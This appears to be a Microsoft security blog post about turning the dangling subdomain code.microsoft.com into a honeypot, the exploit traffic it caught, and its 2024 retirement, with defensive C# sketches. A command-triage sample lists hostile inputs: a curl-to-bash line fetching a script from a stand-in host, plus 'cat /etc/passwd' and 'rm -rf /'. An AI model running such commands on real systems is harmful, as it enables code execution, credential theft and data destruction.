The domain name code.microsoft.com has an interesting story behind it. Today it's not linked to anything, but that wasn't always true. This is the story of one of my most successful honeypot instances and how it enabled us to collect varied threat intelligence on a broad range of actor groups targeting Microsoft. I'm writing this now as we've decided to retire this capability.
In the past the domain 'code.microsoft.com' was an early home for Visual Studio Code and some helpful documentation. The domain was active until around 2021, when this documentation was moved to a new home. The site behind the domain was an Azure App Service instance that performed the redirection, preventing existing links from being broken.
Sometime around mid-2021 the Azure App Service instance was shut down, leaving code.microsoft.com pointing to a service that no longer existed. This created a vulnerability.
This situation is what's called a dangling subdomain: a subdomain that once pointed to a valid resource but now hangs in limbo. Imagine a subdomain like blog.somedomain.com that used to serve a blog application. When the underlying service (the blog engine) is deleted, you might update your page links and assume the service has been retired. However, the DNS record for the subdomain still points at the now-deleted blog; it is "dangling" and no longer resolves to anything you control.
A malicious actor can discover the dangling subdomain and provision an Azure resource with the same name. Now visiting blog.somedomain.com resolves to the attacker's resource, where they control the content.
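To make the takeover risk concrete, here is a minimal sketch of how a defender might check an inventory of subdomains for names that no longer resolve. It uses only the standard .NET DNS APIs, and the subdomain names are hypothetical; real takeover detection also needs to inspect CNAME targets and cloud-provider responses.

```csharp
// Minimal sketch: flag owned subdomains that no longer resolve so they can be
// reviewed for dangling DNS records. Illustrative only - not Microsoft tooling.
using System;
using System.Net;
using System.Net.Sockets;
using System.Threading.Tasks;

class DanglingSubdomainCheck
{
    static async Task Main()
    {
        // Hypothetical inventory of subdomains you control.
        string[] subdomains = { "blog.somedomain.com", "shop.somedomain.com" };

        foreach (var host in subdomains)
        {
            try
            {
                var addresses = await Dns.GetHostAddressesAsync(host);
                Console.WriteLine($"{host} resolves to {addresses.Length} address(es) - looks OK");
            }
            catch (SocketException)
            {
                // The name no longer resolves. If a CNAME still points at a
                // deleted cloud resource, an attacker may be able to claim it.
                Console.WriteLine($"{host} does not resolve - review for a dangling record");
            }
        }
    }
}
```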
This happened in 2021, when the domain was temporarily used to host a malware C2 service. Thanks to multiple reports from our great community this was quickly spotted and taken down before it could be used. In response, Microsoft now has more robust tools in place to catch similar threats.
How did it become a honeypot?
Today it is relatively routine for MSTIC to take control of attacker-controlled resources and repurpose them for threat intelligence collection. Taking over a malware C2 environment, for example, can let us discover newly infected nodes.
At the time of the dangling code subdomain this process was relatively new. We wanted a good test case to show the value of taking over resources rather than simply taking them down. So instead of removing the dangling subdomain we pointed it at a node in our existing, vast honeypot sensor network.
A honeypot is a decoy system designed to attract and monitor malicious activity. Honeypots can be used to collect information about the attackers, their tools, their techniques, and their intentions. Honeypots can also be used to divert the attackers from the real targets and to waste their time and resources.
Microsoft's honeypot sensor network has been in development since 2018. It's used to collect information on emerging threats to both our own and our customers' environments. The data we collect helps us be better informed when a new vulnerability is disclosed and gives us retrospective information on how, when and where exploits are deployed.
This data is enriched with other tools Microsoft has available, turning it from raw threat data into threat intelligence. This is incorporated into a variety of our security products, and customers can also get access to it via Sentinel's emerging threat feed.
The honeypot itself is a custom-designed framework written in C#. It enables security researchers to quickly deploy anything from a single HTTP exploit handler in one or two lines of code all the way up to complex protocols like SSH and VNC. For even more complex protocols we can hand off to real systems when we detect exploit traffic and revert them shortly after.
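To give a feel for what "an HTTP exploit handler in one or two lines" could look like, here is a rough sketch using ASP.NET Core minimal APIs. The internal framework's API is not public, so the route, logging and canned response below are hypothetical stand-ins rather than the real handler.

```csharp
// Program.cs for a minimal ASP.NET Core app. The route and response are
// hypothetical; nothing here is the real honeypot framework.
var builder = WebApplication.CreateBuilder(args);
var app = builder.Build();

// The "one or two lines": stand up a fake vulnerable endpoint, log the
// attempt, and return the output an attacker's proof-of-concept expects.
app.MapGet("/fake/vulnerable/endpoint", (HttpRequest req) =>
{
    Console.WriteLine($"Exploit attempt from {req.HttpContext.Connection.RemoteIpAddress}: {req.QueryString}");
    return Results.Text("uid=0(root) gid=0(root) groups=0(root)"); // canned output - nothing is executed
});

app.Run();
```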
It is our mission to deny threat actors access to resources and to never let them use our infrastructure to create further victims. That's why, in almost all scenarios, the attacker is playing in a high-interaction, simulated environment. No code is run; everything is a trick or deception designed to get them to reveal their intentions to us.
Substantial engineering has gone into our simulation framework. Today over 300 vulnerabilities can be triggered through the same exploit proof-of-concepts available in places like GitHub and Exploit-DB. Threat actors can communicate over more than 30 different protocols and can even 'log in', deploy scripts and execute payloads that look like they are operating on a real system. There is no real system, and almost everything is being simulated.
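A minimal sketch of that deception idea, assuming nothing more than a lookup table of canned responses: commands an attacker types are matched against pre-baked output and never executed. The responses below are invented examples, not the real deception content.

```csharp
// Sketch of the "everything is simulated" idea: attacker commands are matched
// against canned responses and never executed. Responses are invented examples.
using System;
using System.Collections.Generic;

class FakeShell
{
    static readonly Dictionary<string, string> CannedOutput = new()
    {
        ["whoami"]   = "root",
        ["id"]       = "uid=0(root) gid=0(root) groups=0(root)",
        ["uname -a"] = "Linux web01 4.15.0-112-generic #113-Ubuntu SMP x86_64 GNU/Linux"
    };

    public static string Handle(string command)
    {
        // Log the command for analysis (omitted here), then return a plausible
        // response. Unknown commands get a generic shell-style error.
        return CannedOutput.TryGetValue(command.Trim(), out var output)
            ? output
            : $"bash: {command}: command not found";
    }

    static void Main()
    {
        Console.WriteLine(Handle("whoami"));   // "root"
        Console.WriteLine(Handle("rm -rf /")); // just a dictionary miss - nothing is run
    }
}
```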
Even so, when standing up a honeypot on an important domain like microsoft.com, it was important that attackers could not use it as an environment to perform other web attacks, such as attacks that rely on same-origin trust. To mitigate this further we added the sandbox policy to the pages, which prevents these kinds of attacks.
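One way to do this, and a reasonable reading of "the sandbox policy", is the Content-Security-Policy sandbox directive, which gives the page an opaque origin and blocks scripts, forms and plugins. The middleware below is an illustrative sketch for an ASP.NET Core pipeline like the one in the earlier sketch; the exact policy used on code.microsoft.com isn't published.

```csharp
// Illustrative middleware for an ASP.NET Core pipeline like the sketch above.
// "sandbox" with no allowances gives the page an opaque origin and blocks
// script execution, forms and plugins, so honeypot pages can't be abused for
// attacks that depend on the microsoft.com origin.
app.Use(async (context, next) =>
{
    context.Response.Headers["Content-Security-Policy"] = "sandbox";
    await next();
});
```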
What have we learnt from the honeypot?
Our sensor network has contributed to many successes over the years. We've presented on these at computer security conferences in the past, as well as shared our data with academia and the community. We incorporate this data into our security products to enable them to be aware of the latest threats.
In recent years this capability has been crucial to understanding the 0-day and n-day ecosystem. During the Log4Shell incident we were able to use our sensor network to track each iteration of the underlying vulnerability and associated proof-of-concept all the way back to GitHub. This helped us understand the groups involved in productionising the exploit and where it was being targeted. Our data enables internal teams to be much better prepared to remediate and provides the analysis detection authors need to improve products like MDE in real time.
The team developing this capability also works closely with MSRC, who track our own security issues. When the Exchange ProxyLogon vulnerability was announced we had already written a full exploit handler in our environment to track and understand not just the exploit but the groups deploying it. This situational awareness enables us to give clearer advice to industry, better protect our customers, and integrate the new threats we were seeing into Windows Defender and MDE.
The domain code.microsoft.com was often critical to the success of this, as well as a useful early warning system. When new vulnerabilities are announced, threat actors are often too consumed with trying to use the vulnerability as quickly as possible to check for deception infrastructure like a honeypot. As a result, code.microsoft.com often saw exploits first, and many of these exploits were attributed to threat actors MSTIC already tracks.
What happened next?
The code subdomain had been known to bug bounty researchers for several years. When we received reports for this domain they would be closed with a note letting the researcher know they had found a honeypot.
In the past we've asked these security professionals to refrain from publishing the details of this service in an effort to protect the value we received from it. We've also understood for a while that this subdomain would need to be retired once it became well known what was behind it.
That time is now.
On the 25th of April an uptick in traffic to the subdomain and posts on Twitter showed that the domain was being investigated by a broad group of individuals. We don't want to waste the effort researchers put into finding issues with our production systems, so it was decided that the truth would finally be revealed and the system retired.
The timeline below gives the order of events from our perspective. It's unknown exactly how the full exploit URL for our server ended up in Google's search database, but it looks like this, together with the associated discovery on Twitter/X, culminated in almost 80k WeChat exploits in a three-hour period. It's unlikely the Google crawler would have naturally found the URL. Our current theory is that a security researcher found it and submitted a report to Microsoft; as part of this process either the Chrome browser or another app saw the URL and submitted it for indexing.
| Date | Event |
| --- | --- |
| March 2024 | WeChat exploit appears in Google search results for the first time |
| 15th April 2024 | Sumit Jain posts a redacted screenshot of an exploit mitigation; some debate occurs about whether the domain is the code subdomain |
| 21st April 2024 | Google Trends shows that many people are now searching for this domain |
| 24th April 2024 | We start to notice a significant uptick in traffic to the subdomain |
| 26th April 2024 | We are handling 126 thousand times more requests than average |
By the 26th of April we were handling ~160k requests per day, up from the usual 5-100. Most of these requests were to a single endpoint handling a vulnerability in the WeChat Broadcast plugin for WordPress (CVE-2018-16283), which enabled anyone to 'run' a command from a parameter in the URI.
Looking at these URIs we found 11k different commands being 'run'. Most of these pushed a message from some group or another stating that the site had been hacked by them. As this was a simulation, that did not happen.
Removing these messages gives a clearer picture of the kinds of commands people were entering.
Most commands entered were Linux recon commands. These attempted to find out what the system was, what files it contained and, more broadly, what value it had to Microsoft. The next biggest group was command execution; these ranged from basic Linux commands like 'whoami' to scripts in various languages run by a few enterprising folks.
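As a toy illustration of that kind of triage, the sketch below buckets logged commands into rough categories. The category rules and the sample commands are invented for illustration and far simpler than the real analysis.

```csharp
// Toy triage of commands extracted from request URIs. Rules and samples are
// invented for illustration and far simpler than the real analysis.
using System;
using System.Linq;

class CommandTriage
{
    static string Classify(string command) => command switch
    {
        var c when c.Contains("hacked by", StringComparison.OrdinalIgnoreCase) => "defacement message",
        var c when c.StartsWith("whoami") || c.StartsWith("uname") ||
                   c.StartsWith("cat ") || c.StartsWith("id") || c.StartsWith("ls") => "recon",
        var c when c.Contains("curl") || c.Contains("wget") || c.Contains("| bash") => "script / payload execution",
        _ => "other"
    };

    static void Main()
    {
        // Hypothetical commands pulled from logged exploit URIs.
        var commands = new[]
        {
            "whoami",
            "echo hacked by example_group",
            "curl http://example.invalid/x.sh | bash",
            "cat /etc/passwd"
        };

        foreach (var group in commands.GroupBy(Classify))
            Console.WriteLine($"{group.Key}: {group.Count()}");
    }
}
```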
Most people who interacted didn't get further than the WeChat exploit. Over the three days that infosec Twitter took an interest, 63 different exploits in total were triggered. The biggest surprise to me was that most researchers stuck to HTTP; only three groups probed the other ports, and even fewer logged into the other services that were available.
Some of the best investigation came from @simplylurking2 on Twitter/X, who, after finding out the system was a honeypot, continued to analyse what we had in place, first constructing a rick roll and then a URL that, when visited, would display a message to right-click and save a payload.
With so much information now publicly available, the usefulness of this subdomain has diminished. On April 26th we replaced the site with a 404 message and are working on retiring the subdomain completely.
Our TI collection is undiminished; Microsoft runs many of these collection services across multiple datacentres. The concept has been proven, and we have rolled out similar capabilities at higher scale in many other locations worldwide. These continue to give us a detailed picture of emerging threats.